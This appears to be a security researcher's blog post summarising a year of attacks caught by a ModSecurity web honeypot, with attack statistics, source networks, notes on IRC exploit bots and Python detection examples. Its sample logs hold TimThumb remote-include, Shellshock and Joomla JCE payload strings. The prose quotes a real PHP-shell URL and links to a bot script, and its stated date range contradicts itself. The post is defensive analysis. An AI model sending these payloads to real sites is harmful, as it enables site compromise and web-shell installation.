A year of Web Attacks

My web honeypot has reached its first year, so I decided to write a summary with some statistics.

Some information about this web honeypot.
The address: http://www.malekal.com/modsec/
Attack detection is done by the ModSecurity module; every detected attack is captured and stored in a database.
Attacking IPs are blacklisted for one hour.

General information

Below is a screenshot of the attacks per day.
The peaks are big WordPress brute-force attacks.
The last increase is due to better spam detection and a Joomla JCE attack campaign.

(screenshot: year_webattacks2)

(screenshot: year_webattacks)

So, from 2014-09-13 to 2014-09-13 we got a total of 21516 attacks, including:

  • 10262 WordPress brute-force attacks
  • 1405 WordPress TimThumb attacks
  • 2132 Joomla JCE attacks
  • 5401 spam attacks (and a lot of spam is missed)

First surprise: my website runs WordPress, yet I got more Joomla JCE attacks than WordPress TimThumb attacks.
Not that many ShellShock scans.
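To make the categories above concrete, here is an added example (not the honeypot's own code, which relies on ModSecurity rules and a database) that classifies web-server hits into the same categories, counts them per category, per day and per source IP, and replays the traffic through a one-hour IP blacklist like the one described at the top of the post. The log lines are constructed Apache "combined" entries using documentation IP ranges, and the detection rules are simplified approximations of what a ModSecurity ruleset would flag.

```python
"""Classify web-server hits into the attack categories counted in the post and
simulate the one-hour IP blacklist.

Added example, not the honeypot's own code. The log lines are constructed
Apache "combined" entries; the rules are simplified approximations of what a
ModSecurity ruleset would flag.
"""
import re
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample traffic: two brute-force logins, one TimThumb fetch of a
# remote PHP file, one Joomla JCE request, one comment-spam POST, one
# Shellshock probe in the User-Agent, and one benign page view.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Oct/2014:19:36:08 +0200] "POST /wp-login.php HTTP/1.1" 200 3456 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Oct/2014:19:36:09 +0200] "POST /wp-login.php HTTP/1.1" 200 3456 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Oct/2014:19:40:01 +0200] "GET /wp-content/themes/t/timthumb.php?src=http://flickr.com.example.invalid/xp.php HTTP/1.1" 403 0 "-" "-"
198.51.100.9 - - [16/Oct/2014:19:41:13 +0200] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager HTTP/1.1" 403 0 "-" "-"
192.0.2.33 - - [16/Oct/2014:19:45:42 +0200] "POST /wp-comments-post.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
192.0.2.33 - - [17/Oct/2014:02:10:00 +0200] "GET /index.php HTTP/1.1" 200 8000 "-" "() { :; };"
198.51.100.50 - - [17/Oct/2014:08:00:00 +0200] "GET /about/ HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Category name -> predicate over a parsed record; the first match wins.
RULES = [
    ("shellshock", lambda r: "() {" in r["ua"] or "() {" in r["referer"]),
    ("wordpress_bruteforce", lambda r: r["method"] == "POST" and r["path"].startswith("/wp-login.php")),
    ("wordpress_timthumb", lambda r: re.search(r"timthumb\.php\?.*\bsrc=https?://", r["path"], re.I) is not None),
    ("joomla_jce", lambda r: "option=com_jce" in r["path"] and "task=plugin" in r["path"]),
    ("spam", lambda r: r["method"] == "POST" and r["path"].startswith("/wp-comments-post.php")),
]

BLOCK_FOR = timedelta(hours=1)  # the post's honeypot blacklists an IP for one hour


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def classify(rec):
    """Name of the first matching attack category, or None for benign traffic."""
    for name, test in RULES:
        if test(rec):
            return name
    return None


def summarize(log_text):
    """Count attacks per category, per day and per source IP (no blacklisting)."""
    by_category, by_day, by_ip = Counter(), Counter(), Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        cat = classify(rec)
        if cat is None:
            continue
        by_category[cat] += 1
        by_day[rec["time"].date().isoformat()] += 1
        by_ip[rec["ip"]] += 1
    return by_category, by_day, by_ip


class Blacklist:
    """IP -> time until which it is blocked; entries expire after BLOCK_FOR."""

    def __init__(self):
        self._until = {}

    def block(self, ip, now):
        self._until[ip] = now + BLOCK_FOR

    def is_blocked(self, ip, now):
        until = self._until.get(ip)
        return until is not None and now < until


def replay(log_text):
    """Replay the log through the one-hour blacklist.

    Returns (attacks_detected, requests_dropped). A request from a currently
    blocked IP is dropped before any rule runs, so a scanner's further hits
    during that hour are neither classified nor counted.
    """
    bl, detected, dropped = Blacklist(), 0, 0
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if bl.is_blocked(rec["ip"], rec["time"]):
            dropped += 1
            continue
        if classify(rec) is not None:
            detected += 1
            bl.block(rec["ip"], rec["time"])
    return detected, dropped


if __name__ == "__main__":
    cats, days, ips = summarize(SAMPLE_LOG)
    print("per category:", dict(cats))
    print("per day:", dict(days))
    print("top sources:", ips.most_common(3))
    print("with blacklist (detected, dropped):", replay(SAMPLE_LOG))
```

The replay shows a side effect of blacklisting worth keeping in mind when reading the numbers: the second brute-force POST from the same IP arrives inside the blocked hour and is dropped rather than counted, so per-category totals from such a setup are lower bounds on the real attack volume.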

(screenshot: year_webattacks3)

Not mentioned above: there were also 52 PHP exploit attacks used to spread BossaBot some time ago.

(screenshot: hack_attempt)

About netnames

CHINANET is by far the first netname as the source, and the second is OVH.

(screenshot taken 2014-10-16 19:36:08)

OVH reacted after the Nuclear Pack story and some tweets.
We can see a decrease around February 2014.

(screenshot taken 2014-10-16 19:45:42)

Spam Attacks

Most of the spam attacks are spam comments on my WordPress.

China is by far the first source with 73.6%: http://www.malekal.com/modsec/graph_categories.php?t=1&a=spam
The second is Ukraine with 16.4%.

(screenshot: Spam_China_source)

As you can see, CHINANET-FJ is the first netname with 56.9%; the second netname is UNICOM-FJ6PUTIAN-MAN (15.7%).
Blocking this netname will probably reduce the spam on your blog.
Screenshot of the attacks from CHINANET-FJ (the last increase is due to better spam detection). Around 60 attempts per day.

(screenshot: CHINANET)

WordPress TimThumb and Joomla JCE

These vulnerabilities are exploited to upload a PHP shell or an upload form.

A WordPress TimThumb attempt: http://www.malekal.com/modsec/index.php?ip=92.46.62.199#305934 – the remote URL is flickr.com.hotelkouris.gr/xp.php and leads to a PHP shell:

(screenshots: Web_injection3, Web_injection_PHPShell)

Or http://www.malekal.com/modsec/index.php?ip=5.135.143.169#305945, which uploads an upload form:

(screenshot: Web_injection_FormUpload)
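The remote URL in the attempt above has the shape that slipped past old TimThumb versions (the 2011 remote-file issue): the script compared the requested hostname against its allowed-site list by substring, so any host that merely contains "flickr.com" was treated as Flickr. The following is an added illustration in Python, not TimThumb's own PHP code; `ALLOWED_SITES` is a constructed stand-in for the script's list. It puts the vulnerable host check next to a hardened one that requires an exact domain match (or a real subdomain of it) and an http(s) scheme.

```python
"""Vulnerable substring host check versus a strict host match.

Added example, not TimThumb's own code. ALLOWED_SITES is a constructed
stand-in for an image-proxy allow-list.
"""
from urllib.parse import urlsplit

ALLOWED_SITES = ["flickr.com", "picasa.com", "img.youtube.com"]


def naive_host_allowed(url):
    """Vulnerable: accepts any host that merely *contains* an allowed name,
    so 'flickr.com.hotelkouris.gr' passes as if it were flickr.com."""
    host = (urlsplit(url).hostname or "").lower()
    return any(site in host for site in ALLOWED_SITES)


def strict_host_allowed(url):
    """Hardened: http(s) only, and the host must equal an allowed name or be
    a subdomain of it (label boundary enforced by the leading dot)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    return any(host == site or host.endswith("." + site) for site in ALLOWED_SITES)


def compare(urls):
    """Return {url: (naive_result, strict_result)} for a batch of URLs."""
    return {u: (naive_host_allowed(u), strict_host_allowed(u)) for u in urls}


if __name__ == "__main__":
    # The first URL is the host seen in the honeypot; the others are constructed.
    for url, (naive, strict) in compare([
        "http://flickr.com.hotelkouris.gr/xp.php",
        "http://farm1.flickr.com/photo.jpg",
        "http://flickr.com/photo.jpg",
        "ftp://flickr.com/photo.jpg",
        "http://evil.test/flickr.com/x.jpg",
    ]).items():
        print(f"{url:45} naive={naive!s:5} strict={strict}")
```

The difference is the comparison boundary: `site in host` matches anywhere in the string, while `host == site or host.endswith("." + site)` only matches the domain itself or a label beneath it, so the honeypot's `flickr.com.hotelkouris.gr` is rejected while a genuine `farm1.flickr.com` still works.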

(screenshot: Web_injection4)

On the hackers' side, there are a lot of bots available on some IRC servers to scan for websites and exploit several vulnerabilities.
Example of the commands available for some bots.
Notice that the bots don't have a Shellshock scan.

(screenshots: Bot_help, Bot_help2)

JCE/TimThumb

(screenshots: JCE_hack_attempt2, JCE_hack_attempt3, JCE_hack_attempt4)

(screenshot: JCE_TimThumb_hack_attempt)

Zen Hack

(screenshot: Shop_hack_attempt)

Magento Shop Exploit

(screenshot: Shop_hack_attempt2)

(screenshot: IRC_hack_attempt)

As you can see, most of the attempts are blind and use web search dorks to reach websites.
That can explain why I got more JCE attempts than WordPress ones: it depends on the dork used.
Also, a website with a high rank will probably get more attempts than others.
You can find a script of these bots at this link: http://pjjoint.malekal.com/files.php?read=20141016_k8m6t10y9h6

Most of these groups sell mailers, shells, etc., probably obtained from hacked websites.

BlackUnix Crew

I came across a crew that seems to be very active; they call themselves BlackUnix Crew.

They have some bots to exploit:

(screenshot: Timthumb_hack_attempt)

(screenshot: JCE_hack_attempt)

(screenshot: Timthumb_hack_attempt2)

(screenshot: Blackunix_webattacks)

DDoS stuff:

(screenshot: Blackunix_irc2)

(screenshot: Blackunix_irc3)

Defacing:

(screenshot: Blackunix_defacing)

Carding stuff:

(screenshot: Blackunix_carding)

Of course, there are more professional and discreet groups that hit websites depending on the extension/CMS, etc.
